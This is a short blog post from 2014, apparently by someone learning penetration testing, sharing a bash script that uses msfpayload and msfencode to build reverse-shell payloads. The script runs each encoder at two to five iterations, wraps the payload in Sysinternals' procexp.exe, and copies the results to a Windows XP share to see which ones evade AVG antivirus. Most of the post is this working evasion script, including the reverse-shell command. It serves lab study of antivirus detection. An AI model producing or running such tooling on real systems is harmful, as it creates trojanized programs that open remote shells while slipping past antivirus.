Sunday, November 23, 2014

msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations.  Then in the script copy it over to a file share on a Windows XP SP3 computer with AVG installed.  The AVG would then detect if it was a virus.

Curious how this would work and kicked out the following script. 

#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'

# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'

# Log file where how the payload was created and the filename of the payload
logFile='/root/multiEncoder/logFile.txt'

# Number of iterations to run the encoding through
iterationCount=5

# Bash script to create various payloads that are multi-encoded and test them against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfpayload options
# Payload: windows/shell_reverse_tcp
# LHOST: 172.29.231.1
# LPORT: 8080

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.29.231.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Loop through the available encoders in msfencode.listEncoders
while read listEncoders
do
    # Work through various iteractions allowed for the encoding
    for (( i=2; i<=$iterationCount; i++ ))
    do
        msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k
   
        # If the test.exe fails to be created then skip over the remaining commands
        if [[ -f "/root/multiEncoder/outputFiles/test.exe" ]]; then

            # Create a random 64 character filename to use as the destination file
            randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

            # Save the information to a log file in the event the encoding bypasses the AV
            echo "${randomFileName}.exe - msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k" >> $logFile

            cp -f /root/multiEncoder/outputFiles/test.exe /mnt/payloadTest/${randomFileName}.exe
            cp -f /root/multiEncoder/outputFiles/test.exe /root/multiEncoder/archiveFiles/${randomFileName}.exe
            rm -f /root/multiEncoder/outputFiles/test.exe

        fi
        # End If for the text.exe file not being created
    done
    # Done for the loop on the iteractionCount

done < /root/multiEncoder/msfencode.listEncoders

No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...